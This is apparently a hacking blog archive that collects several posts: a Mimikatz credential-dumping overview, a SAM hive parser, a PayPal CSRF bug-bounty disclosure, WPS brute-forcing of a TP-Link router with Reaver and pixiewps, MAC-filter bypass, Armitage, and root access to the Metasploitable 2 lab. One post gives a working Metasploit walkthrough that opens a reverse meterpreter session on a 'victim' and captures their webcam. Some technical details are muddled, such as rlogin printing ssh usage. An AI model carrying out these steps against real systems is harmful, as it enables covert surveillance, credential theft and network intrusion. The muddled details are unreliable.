Category Archives: (D) Advanced Hacking

Mimikatz – Gather Windows Credentials

Mimikatz is a tool to gather Windows credentials, basically a swiss-army knife of Windows credential gathering that bundles together many of the most useful tasks that you would perform on a Windows machine you have SYSTEM privileges on. It supports both Windows 32-bit and 64-bit and allows you to gather various credential types.

Techniques such as Pass the Hash, Pass the Ticket, Over-Pass The Hash (AKA Pass the Key), Kerberos Golden Ticket, Kerberos Silver Ticket, Pass the Cache & Attacking the Kerberos Session Ticket (TGS).

mimikatz - Gather Windows Credentials

Many people refer to it as a post-exploitation tool, something you would use to take a stronger hold of a network already compromised.

Features

  • Dump credentials from LSASS (Windows Local Security Account database)
    • MSV1.0: hashes & keys (dpapi)
    • Kerberos password, ekeys, tickets, & PIN
    • TsPkg (password)
    • WDigest (clear-text password)
    • LiveSSP (clear-text password)
    • SSP (clear-text password)
  • Generate Kerberos Golden Tickets (Kerberos TGT logon token ticket attack)
  • Generate Kerberos Silver Tickets (Kerberos TGS service ticket attack)
  • Export certificates and keys (even those not normally exportable).
  • Dump cached credentials
  • Stop event monitoring.
  • Bypass Microsoft AppLocker / Software Restriction Polcies
  • Patch Terminal Server
  • Basic GPO bypass

Commands

The primary command components are sekurlsa, kerberos, crypto, vault, and lsadump.

Sekurlsa interacts with the LSASS process in memory to gather credential data and provides enhanced capability over kerberos.

The Mimikatz kerberos command set enables modification of Kerberos tickets and interacts with the official Microsoft Kerberos API. This is the command that creates Golden Tickets. Pass the ticket is also possible with this command since it can inject Kerberos ticket(s) (TGT or TGS) into the current session. External Kerberos tools may be used for session injection, but they must follow the Kerberos credential format (KRB_CRED). Mimikatz kerberos also enables the creation of Silver Tickets which are Kerberos tickets (TGT or TGS) with arbitrary data enabling AD user/ group

Crypto enables export of certificates on the system that are not marked exportable since it bypasses the standard export process.

Vault enables dumping data from the Windows vault.

Lsadump enables dumping credential data from the Security Account Manager (SAM) database which contains the NTLM (sometimes LM hash) and supports online and offline mode as well as dumping credential data from the LSASS process in memory. Lsadump can also be used to dump cached credentials. In a Windows domain, credentials are cached (up to 10) in case a Domain Controller is unavailable for authentication. However, these credentials are stored on the computer.

OS Support

Mimikatz works on:

  • Windows XP
  • Windows Vista
  • Windows 7
  • Windows 8
  • Windows Server 2003
  • Windows Server 2008 / 2008 R2
  • Windows Server 2012 / 2012 R2
  • Windows 10 (beta support)

You can download mimikatz most recent release here:

Latest Release

Retrieve IP Geolocation Information

IPGeoLocation is a Python based tool designed to retrieve IP geolocation information from the ip-api service, useful for building into your security tools.

IPGeoLocation - Retrieve IP Geolocation Information

Do be aware that as this tool is leveraging a 3rd party API, you will be limited to 150 requests a minute. Whilst that is quite a lot, just be wary of it because if you exceed the limit you will get blocked.

Features

  • Retrieve IP or Domain Geolocation.
  • Retrieve your own IP Geolocation.
  • Retrieve Geolocation for IPs or Domains loaded from file. Each target in new line.
  • Define your own custom User Agent string.
  • Select random User-Agent strings from file. Each User Agent string in new line.
  • Proxy support.
  • Select random proxy from file. Each proxy URL in new line.
  • Open IP geolocation in Google Maps using the default browser.
  • Export results to csv, xml and txt format.

Geolocation Information Retrieved

  • ASN
  • City
  • Country
  • Country Code
  • ISP
  • Latitude
  • Longtitude
  • Organization
  • Region Code
  • Region Name
  • Timezone
  • Zip Code

Usage

You can download IPGeoLocation v2.0.3 here:

IPGeoLocation-2.0.3.zip

Parse SAM Registry Hives With Python

SamParser is a Python script used to parse SAM registry hives for both users and groups, it’s only dependency is python-registry.

SamParser - Parse SAM Registry Hives With Python

This would be a great little script to write into another toolset or larger attack pattern, especially if you’re already using a Python kit or framework.

Dependencies

Usage

Sample Output

You can download SamParser here:

samparser.py

How To Hack Webcam 2016

Open Metasploit and run following commands:
msf> show exploits
msf>use windows/browser/adobe_cooltype_sing
msf exploit(adobe_cooltype_sing)> set payload windows/meterpreter/reverse_tcp
payload=> windows/meterpreter/reverse_tcp
msf exploit(adobe_cooltype_sing) > show options
Module options (exploit/windows/browser/adobe_cooltype_sing):
Name Current Setting Required Description
—- ————— ——– ———–
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
—- ————— ——– ———–
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
— —-
0 Automatic
msf exploit(adobe_cooltype_sing) > set SRVHOST 192.168.0.58
SRVHOST => 192.168.0.58
msf exploit(adobe_cooltype_sing) > set SRVPORT 80
SRVPORT => 80
msf exploit(adobe_cooltype_sing) > set uripath /
uripath => /
msf exploit(adobe_cooltype_sing) > set uripath /
uripath => /
msf exploit(adobe_cooltype_sing) >exploit -j
Let the victim open your IP in his/her browser and when it will be opened, you will get 1 meterpreter session.
msf exploit(adobe_cooltype_sing) > session -i 1
meterpreter> run webcam
and you will get the webcam of victim. 🙂

Hacking PayPal Accounts with one click (Patched)

Today I am going to publicly disclose  a critical vulnerability I have found during my research in PayPal, This vulnerability enabled me to completely bypass the CSRF Prevention System implemented by PayPal, The vulnerability is patched very fast and PayPal paid me the maximum bounty they give ;).

1- Reusable CSRF Token:

The CSRF token “that authenticate every single request made by the user” which can be also found in the request body of every request with the parameter name “Auth” get changed with every request made by user for security measures, but after a deep investigation I found out that the CSRF Auth is Reusable for that specific user email address or username, this means If an attacker found any of these CSRF Tokens, He can then make actions in the behalf of any logged in user.
Hmm, it seems interesting but still not exploitable, as there is no way for an attacker to get the “Auth” value from a victim session.

2- Bypassing the CSRF Auth System:

The CSRF Auth verifies every single request of that user, So what If an attacker “not logged in” tries to make a “send money” request then PayPal will ask the attacker to provide his email and password, The attacker will provide the “Victim Email” and ANY password, Then he will capture the request, The request will contain a Valid CSRF Auth token Which is Reusable and Can authorise this specific user requests. Upon Further Investigation, We have found out that an Attacker can obtain the CSRF Auth which can be valid for ALL users, by intercepting the POST request from a page that provide an Auth Token before the Logging-in process, check this page for the magical CSRF Auth “https://www.paypal.com/eg/cgi-bin/webscr?cmd=_send-money”. At this point the attacker Can CSRF “almost” any request on behalf of this user.

The application generates a valid "Auth" token for a logged-out user!

The application generates a valid “Auth” token for a logged-out user!

Through examination of the password change process, I have found that an attacker can NOT Change the victim password without answering the Security Questions set by user, Also the user himself can NOT change the security questions without entering the password!

3- ByPassing the Security Questions Change:

Screen Shot 2014-08-13 at 12.20.52 AM

The initial process of “setting” security questions is not password protected and is reusable

After further investigation, I have noticed that the request of setting up the security questions “which is initiated by the user while signing up” is not password-protected, and it can be reused to reset the security questions up without providing the password, hence, Armed with the CSRF Auth, an attacker can CSRF this process too and change the victim’s Security questions.

At this point, An attacker can conduct a targeted CSRF attack against PayPal users and take a full control over their accounts. Hence, An attacker can CSRF all the requests including but not limited to:

1- Add/Remove/Confirm Email address
2-Add fully privileged users to business account
3- Change Security questions
4- Change Billing/Shipping Address
5- Change Payment methods
6- Change user settings(Notifications/Mobile settings) ………… and more.
To automate the whole process, I have coded a Python interactive server to demonstrate how an attacker can exploit this vulnerability in a real-life scenario attack.

TP Link Archer C5 Router Hacking

TP Link Archer C5 Router Specifications

The TP Link Archer C5 Router is a consumer grade router priced at approximately $70,- dollars and offers a lot of value for the money. The router supports the 802.11 ac standard and offers dual band simultaneous 2.4GHz 300Mbps and 5GHz 867Mbps connections for a total available bandwidth of 1.2Gbps. Both IPv4 and IPv6 are supported by the router. The TP-Link Archer C5 has the following antennas and ports available:

  • 2 External detachable antenna
  • 1 Gigabit WAN port
  • 4 Gigabit LAN ports
  • 2 USB ports for external devices

The USB ports can be used for external devices such as storage devices or a shared printer. Something which seems to be a nice feature on the router is the option to install an isolated wireless guest network (with bandwidth control!) separated from your main network. With this feature you don’t have to worry about sharing the password from your main network with guests.

TP Link Archer C5 - front view 1

TP Link Archer C5 Front view

TP Link Archer C5 - rear view 2

TP Link Archer C5 Rear view

TP Link Archer C5 package contents

The contents of the package included:

  • AC1200 Wireless Dual Band Gigabit Router Archer C5
  • 2 detachable antennas
  • Power supply unit
  • Resource CD
  • Ethernet Cable
  • Quick Installation Guide

When we’re summing up the specifications and features of the TP Link Archer C5 router it seems like a great router for this price. This middle segment TP Link router is targeted at home and small office users. The router is very affordable for a lot of people and seems like a great alternative for the router provided by your ISP. All together this is enough reason to question and test the security of this router. Especially the target group of this TP Link router should think twice before they unpack the router as soon as possible to get it up and running as fast as possible to benefit from its great speed and features without even thinking about proper and safe configuration. Let’s continue this tutorial to see if and how we can hack and secure this router starting by looking at the default passwords.

TP Link Archer C5 Default passwords and settings

As we already expected the default password for the wireless network is the default WPS PIN which consists of 8 numbers. The C5 router we’re testing has the following default WPS PIN which is used as the default wireless key: 98159338. The default username and password to access the router settings is just like all TP Link routers:

Username: admin

Password: admin

TP Link Archer C5 Default SSID settings

The standard SSID name for the 2.4 GHz network is TP-LINK_A361 and for the 5 GHz network is TP-LINK_A360. The standard SSID is based on the routers MAC Address and consists of the last 4 digits of the MAC address subtracted by 1 for the 2.4 GHz SSID and subtracted by 2 with _5G added for the 5 GHz SSID.

TP Link Archer C5 - Label view 3

The MAC address is in hexadecimal notation so if the MAC address ends with a letter that letter is actually a number in decimal notation. For example when the MAC address ends with an A, which is hexadecimal for 10 in decimal, you should subtract 1 from 10 to determine the last digit of the default SSID which would be 9 in this case. If you want to calculate the last digit of the MAC address using the default SSID you would know that it would be A when the last digit of the default SSID is 9.

So far so good because there are TP Link routers around which have their default wireless password based on the MAC address. This is not the case for the TP Link Archer C5 router. Let’s continue with connecting the router and see if it has any WPS vulnerabilities we can exploit.

Scanning the TP Link Archer C5 for WPS vulnerabilities

Wi-Fi Protected Setup (WPS) provides simplified mechanisms connect to wireless networks with a PIN consisting of 8 numbers. The PIN exchange mechanism is vulnerable to brute-force attacks which will return the PIN and WPA key to the attack which can be used to connect to the wireless network. Theoretically there are 10^8 (= 100.000.000) possible values for the WPS PIN. Unfortunately the WPS PIN consists of 8 numbers divided into 3 segments from which can be tested separately with a brute force attack. The last digit is checksum which can be calculated. The PIN has been composed as following:

  • Part 1 of the pin is 5 digits = 10^4 (= 10.000) brute force attempts needed to retrieve this segment.
  • Part 2 of the PIN is 3 digits = 10^3 (1.000) brute force attempts needed to retrieve this segment.
  • Part 3 of the PIN is 1 digit which is a calculated checksum.

A WPS brute force tool like Reaver, which is included with Kali Linux, brute forces part 1 and 2 of the PIN in a maximum of 11.000 attempts. When a router is vulnerable to this WPS attack it will be 100% effective and grand the attacker access to your network no matter how strong the password is. During the attack with Reaver the attack has to be in range of the access point. A lot of routers nowadays have range limiting for WPS brute force attacks which means that the WPS part will lock up until it is manually unlocked by the owner of the router. During the lock it is not possible to brute force any of the WPS PIN segments. A commonly use method to avoid these lock up’s is MDK3 which can be used to force the router to reboot and release the WPS lock. MDK3 is depreciated nowadays and most routers are invulnerable to DOS attacks with MDK3. Many hackers are looking for new ways to force routers to reboot and unlock the rate limiting through vulnerabilities and exploits. It will probably be a matter of time before new methods pop up which do work.

WPS is enabled by default on the TP Link Archer C5 router so we will be checking it for known WPS vulnerabilities. We’ve done several tutorials on Hacking Tutorials about exploiting WPS vulnerabilities with Reaver and Pixiewps so we won’t get into great detail on these. For detailed tutorials on these subjects have a look at <tutorial name> and <tutorial name>. Let’s fire up Kali Linux and see if we can hack the TP Link Archer C5 router by brute forcing the WPS PIN with Reaver.

Brute forcing the Archer C5 WPS PIN with reaver

First we put our Wifi adapter in monitoring mode using the following command:

Airmon-ng start wlan0

The interface for the monitoring adapter will be wlan0mon. You will most likely receive a message about process who might cause trouble, kill them using the kill command. We can use airodump-ng to locate our access point and retrieve the MAC address. Use the following command to start airodump-ng:

airodump-ng –i wlan0mon

The MAC address appears in the first column which can be copied to your clipboard.

TP Link Archer C5 - Airmon-ng 5

Next we will use the following command to start Reaver:

reaver –I wlan0mon –b [router MAC address] –c [channel] –vv

The reaver attack will start testing some common PINS and will than start with 0 and work its way up to 9.999 for the first WPS PIN segment. As we already expected the TP Link router has rate limiting on the number of WPS attempts. It will lock up after a couple attempts and we need to unlock it manually. When the rate limiting occurs Reaver will throw a warning as following:

TP Link Archer C5 - Reaver Attack 6

TP Link Archer C5 Pixie dust attack

Another WPS vulnerability is known as the Pixie Dust Attack. The Pixie dust attack is performed with a modified version of Reaver with a secondary tool called pixiewps. The pixie dust attack is an offline WPS attack which means that the attackers retrieves the needed data in seconds which than can be used to retrieve the wireless password. This is only applicable to routers which are vulnerable to this attack. Let’s see if the TP Link Archer C5 is vulnerable to this offline pixie dust attack.

To start the pixie dust attack using Reaver use the following command:

reaver -i wlan0mon -b [Router MAC address] -c [channel] -vvv -K 1 –f

TP Link Archer C5 - Reaver Pixie dust Attack 6

Or use the following command to start pixiewps manually and supply the needed data yourself:

pixiewps -e [PKE] -s [EHASH1] -z [EHASH2] -a [AUTHKEY] -S

TP Link Archer C5 - Pixiewps 7

The TP Link Archer C5 router seems to be invulnerable to the pixie dust WPS attack. If a router is vulnerable than pixiewps will return the WPS PIN which can be used in Reaver to retrieve the WPA key using the following command:

reaver -i mon0 -c 1 -b [Router MAC] -vv -S –pin=[WPS PIN]

Let’s see if we run this command on the Archer C5 with the valid WPS PIN:

reaver -i mon0 -c 1 -b [Router MAC] –vv –d 0 –w –n -S –pin=98159338

TP Link Archer C5 - Reaver correct PIN 8

With the correct PIN Reaver will return the WPA PSK.

Although the access point locks itself up after a few attempts it is possible to retrieve the WPA PSK with the correct WPS PIN and Reaver.

Bypass MAC filtering on wireless networks

In this tutorial we will be looking at how to bypass MAC filtering on a wireless network. MAC filtering, or MAC white- or blacklisting, is often used as a security measure to prevent non whitelisted MAC addresses from connecting to the wireless network. MAC Address stands for media access control address and is a unique identifier assigned to your network interface. With MAC filtering you can specify MAC addresses which are allowed or not allowed to connect to the network. For many occasions this might be sufficient as a security measure which makes it a little harder to use the network when the password is known. As a security measure to protect company networks and data or to prevent networks from being hacked over WiFi, MAC filtering is pretty useless and easy to bypass which we’re about to show you in this hacking tutorial.

In this tutorial we will be bypass MAC filtering on a TP link WR-841N router by spoofing the MAC address of a connected client. The connected client’s MAC address is whitelisted, otherwise it would not have been able to connect to the wireless network. We will put our wifi adapter in monitoring mode and retrieve the MAC address of connected clients with Airodump-NG on Kali Linux. Then we will be using the Macchanger tool to spoof our MAC address, bypass MAC filtering and connect to the wireless network. Hacking the WiFi network password is outside the scope of this tutorial. You can have a look at the following WiFi hacking tutorials and tools to learn how to retrieve the password (and prevent this from happening):

MAC filtering settings

First we will be configuring the MAC filtering functionality in the router settings. We will be adding one client to the whitelist which will be our connected client:

Bypass MAC Filtering on wireless network - MAC Filtering on TP-link router

We’ve added one MAC address to the whitelist.

Let’s try to connect from another client in Kali Linux 2.0:

Bypass MAC Filtering on wireless network-2

Unable to connect from a non whitelisted MAC Address

Even if we use the right password is does not allow us to connect to the wireless network. We end up in an endless loop without authentication. This tells us the MAC filtering is active and working like a charm.

Bypass MAC Filtering

First we will have to put our WiFi adapter in monitoring mode using Airmon-ng and kill all the processes Kali Linux is complaining about:

airmon-ng start wlan0

kill [pid]

Then we launch Airodump-ng to locate the wireless network and the connected client(s) using the following command:

airodump-ng –c [channel] –bssid [target router MAC Address] –i wlan0mon

Airodump-ng now shows us a list of all connected clients at the bottom of the terminal. The second column lists the MAC Addresses of the connected client which we will be spoofing in order to authenticate with the wireless network.

Bypass MAC Filtering on wireless network-3

One connected client with a whitelisted MAC Address.

Spoofing the MAC Address with Macchanger

Now that we know a MAC address that is whitelisted in the TP Link router settings we can use it to spoof our own MAC address in order to authenticate with the network. Let’s spoof the MAC address of your wireless adapter but first we take need to take down the monitoring interface wlan0mon and the wlan0 interface in order to change the MAC address. We can do this by using the following command:

Airmon-ng stop wlan0mon

Now we take down the wireless interface who’s MAC address we want to spoof with the following command:

ifconfig wlan0 down

Now we can use Macchanger to change the MAC address:

macchanger -m [New MAC Address] wlan0

And bring it up again:

ifconfig wlan0 up

Now that we have changed the MAC address of our wireless adapter to a whitelisted MAC address in the router we can try to authenticate with the network and see if we’re able to connect:

Bypass MAC Filtering on wireless network-4

Connected!

As you can see we have managed to connect to the wireless network using a spoofed MAC address of a connected client. This tutorial shows us that it was extremely easy to bypass MAC filtering on a wireless network and that MAC filtering in general is useless to protect your network from hackers.

Introduction To Armitage in Kali : Hack without one line of code

Fast and easy hacking, that’s what the official Armitage website is named as. And fast and easy hacking it is. It is not recommended starting your life as a penetration tester with Armitage. But after you know the basics of metasploit (which you do now), you can take a look at this great tool. And I’ve started to assume you have Kali Linux installed.

Installing Metasploit

Now metasploit is not distributed with Kali Linux (it was distributed with backtrack though). However, Kali has it on its repositories, and it can be easily downloaded and installed by executing-

apt-get install armitage

It will check dependencies and download the required file and install Armitage for you.  After its done, you can start armitage by using the following code-

service postgresql start

 service metasploit start

armitage

You will get a screen like this. Let the settings be as they are, and click connect. You’ll get a prompt like this (most of the time)

Now you’ll see Armitage making some connection for you. For a short while it might show failure messages (Connection Refused), but after some time Armitage will start.

And you’ll end up with a windows somewhat like this

Now while I do believe that the developer has succeeded in making a tool which permits me to say – “I’ll take my leave, you can handle stuff from here”, but I’d still go on for a while, helping you know some basic stuff before I take my leave.

Armitage Basics

Now the tough coding (honestly there wasn’t anything tough about that) that you had to do with Metasploit, becomes as easy as a click on Armitage. Better yet, you can see exactly what line of code is actually executed when you do something with your mouse. As a start, you should do a quick scan with OS detect.
And while it does ask you to enter some stuff now, it is going to be pretty easy, you just have to follow the example given by armitage with some modification.
First do your old ifconfig on a new terminal to find you IP

ifconfig

Notice that most of the time, the first 6 digits are 192.168. You have to figure out the next 3 digits. After that, you can enter the ip into the armitage window. Look at the sample it had provided, just copy that, and, replacing the 1 with 154 as in my case. You final code should be 192.168.154.0/24. The 0/24 means it’ll look at all the IPs from 192.168.154.1 to 192.168.154.256. Actually it scans IP from 192.168.xxx.0 through 192.168.xxx.255. Most of the time, you’ll find your host in this range, however, to include all IP from 192.168.0.0 to 192.168.255.255, you may use 192.168.0.0/16.

This is the automatically generated code after clicking OK.

Now, after a few seconds, you will see the following message, and it tells you exactly what you’re supposed to do next.

Now a couple of computers with respective OS icons will show up on your screen. As expected, you’ll have to go to Attacks -> Find attacks. There’s no rocket science here, and I’m not putting any more screenshots. After that, right click on the computer you want to hack, and you’ll see an attack option. Select whichever you want to try, enter the requisites (you learnt how to do Information gathering in the previous Metasploit tutorials). Everything will be quite easy, except for the fact that the exploits in attack section will be possible exploits, that might or might not work. If you’re expecting a click to hack you a Windows 7 machine, then that’s just not happening. It might work with an unpatched XP machine, a ms03_026_dcom might do the trick, or the netapi one. Good luck with playing around with this tool. And here’s the official Armitage website (media section link, useful vids and pics there) where you might find some more guidance, though the tool doesn’t need any.

Metasploitable 2 Linux – Most Vulnerable OS in the town : Introduction and Installation

What is Metasploitable 2

The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. Version 2 of this virtual machine is available for download and ships with even more vulnerabilities than the original image. This virtual machine is compatible with VMWare, VirtualBox, and other common virtualization platforms. By default, Metasploitable’s network interfaces are bound to the NAT and Host-only network adapters, and the image should never be exposed to a hostile network.   [Quoted from Rapid7]

Download and install metasploitable linux

Firstly, I’d list some requirements- 10 to 30 GB disk space for metasploitable (Kali would need a similar amount of disk space), 1GB ram for metasploitable (a total of 4GB would be great, 1gb for kali, 1gb for metasploit, and 2gb will keep your host OS running). If you have all this, which you probably should, then go ahead and download Metasploitable from sourceforge. – http://sourceforge.net/projects/metasploitable/
The last time I checked, the download was a zip file.

After extracting it, no installation is needed. What IS needed is a virtual machine software like Vmware or virtualbox. You can use Virtual Box, which is free, or VmWare workstation, which you’ll have to buy, Vmware player is free, and will serve most of your purposes. I am using Vmware Workstation, and will give the instructions for it. Detailed guides are available for all of these on the internet, and I won’t waste much time with it. Assuming you have downloaded and extracted the Metasploitable file, and installed Vmware Workstation, follow these instruction-

Open Vmware workstation. Click on file -> Open. Something like this will pop out. After that browse to the location where you extracted the Metasploitable file. It must look somewhat like this. Click on open. You will see something with Vmware icon. Open that one.

Your Virtual machine will be up and running within a few minutes. Depending on the situation, a few more
next and enter stuff would be required, but the instructions provided by the program would be simple and clear and you can help yourself.

Once you’ve started Metasploitable

You’ll have a login prompt, and the login username and password would be given right there. It would be msfadmin, if you can’t seem to find it. Nothing else needs to be done here. Now your target is ready, but you are far from done. If this is not your visit to this blog, then you have probably already installed Kali Linux and know how to use it. If you have been following this blog for a long time, then you also know how to use Metasploit to hack Windows machine, and are ready to jump to the next post. So if you have to OS, and the basic hacking skills, then you can stop here and move to the next post, else read on.

Kali Linux and metasploit

While its not necessary to use Kali Linux, and Backtrack, Backbox Linux and other Linux distributions will work well too, there is no reason why NOT to use Kali Linux. It simplifies everything for you, providing you with 100s of tools pre-installed, and is specifically designed for pentesting. It has some advantages over Backtrack, most importantly, it has been written from scratch in Debian and has resolved most of the backtrack issues. It comes preinstalled with Metasploit, so it takes down one step. I have written enough posts on installing Kali Linux to write another one here, so I’m just gonna provide links to posts on my blog which you should read and then come back here. If you expected to read just one post and become ‘that cool kid who can hack anything’, then you are up for a disappointment.

Metasploitable 2 : Vulnerability assessment and Remote Login

 

Portscan

On a Kali Linux machine, open a terminal. Type ifconfig, and note the eth0 IP address. This will give you an idea of what the ip of your target machine could be. In my case, ifconfig returned my IPv4 address as 192.168.154.131. This means that Metasploitable must have an IP residing somewhere in the 192.168.154.xxx range. To scan all ports in that range, you can use Nmap scan. Here is what it should look like.

nmap -sS 192.168.154.0/24

The conclusion that can be drawn here is that the Metasploitable 2 machine has IP 192.168.154.132. Also, it has a huge lot of open ports. As you will discover later, each of these ports is a potential gateway into the machine. On the metasploitable machine, after logging in with msfadmin:msfadmin, you can execute an ifconfig to verify that the IP is indeed 192.168.154.132 (or whatever may be your case).

Vulnerabilities

Now the Metasploitable 2 operating system has been loaded with a large number of vulnerabilites. There are the following kinds of vulnerabilities in Metasploitable 2-
  1. Misconfigured Services – A lot of services have been misconfigured and provide direct entry into the operating system.
  2. Backdoors – A few programs and services have been backdoored. These backdoors can be used to gain access to the OS.
  3. Weak Passwords – These are vulnerable to bruteforce attacks.
  4. Vulnerable Web Services– A few web services pre-installed into Metasploitable have known vulnerabilities which can be exploited.
  5. Web Application Vulnerabilities – Some vulnerable web applications can be exploited to gain entry to the system.
There is a very resourceful article about many vulnerabilities on Rapid7 website.

Exploiting The Vulnerabilities

Remote access vulnerability – Rlogin

Remember the list of open ports which you came up across during the port scan? The 512,513 and 514 ports are there for remotely accessing Unix machines. They have been misconfigured in such a way that anyone can set up a remote connection without proper authentication. This vulnerability is easy to exploit. We will use rlogin to remotely login to Metasploitable 2. Type rlogin to see the details about the command structure.

 

root@kali:~# rlogin

usage: ssh [-1246AaCfgKkMNnqsTtVvXxYy] [-b bind_address] [-c cipher_spec]

           [-D [bind_address:]port] [-e escape_char] [-F configfile]

           [-I pkcs11] [-i identity_file]

           [-L [bind_address:]port:host:hostport]

           [-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option] [-p port]

           [-R [bind_address:]port:host:hostport] [-S ctl_path]

           [-W host:port] [-w local_tun[:remote_tun]]

           [user@]hostname [command]

rlogin -l root 192.168.154.132

Most probably you will get something like this-

root@kali:~# rlogin -l root 192.168.154.132

The authenticity of host ‘192.168.154.132 (192.168.154.132)’ can’t be established.

RSA key fingerprint is *****.

Are you sure you want to continue connecting (yes/no)? yes

Warning: Permanently added ‘192.168.154.132’ (RSA) to the list of known hosts.

root@192.168.154.132’s password:

As you can see, it is asking for a password. It’s not because the target is not vulnerable. It’s because we don’t have ssh-client installed on Kali Linux. The rsh-client is a remote login utility that it will allow users to connect to remote machines.

apt-get install rsh-client

This will start the installation progress, you’ll have to type yes once or twice, Kali will do the rest for you. After the installation is successful, you should try your previous command again. This time around, things will be better.

 

root@kali:~# rlogin -l root 192.168.154.132

Last login: Thu May  1 11:34:55 EDT 2014 from :0.0 on pts/0

Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;

the exact distribution terms for each program are described in the

individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by

applicable law.

To access official Ubuntu documentation, please visit:

http://help.ubuntu.com/

You have mail.

root@metasploitable:~#

Now you have an administrator privilege shell on Metasploitable 2. That was as easy as typing one line. (and installing an application). We have one more such vulnerability that can be exploited easily.

Telnet Vulnerability

Look at the open port list again. On port 21, Metasploitable 2 runs VSFTPD, a popular FTP server. The version that is installed on Metasploit contains a backdoor. The backdoor was quickly identified and removed, but not before quite a few people downloaded it. If a username is sent that ends in the sequence “:)” (the happy smiley), the backdoored version will open a listening shell on port 6200. This means anyone can login to a computer without knowing the credentials, just use :). This can be exploited using Metasploit. We will cover this in the next tutorial. Till then something for your appetite-

telnet 192.168.99.131 1524

This is a another one line exploit, on the 1524 ingreslock port (see portscan result).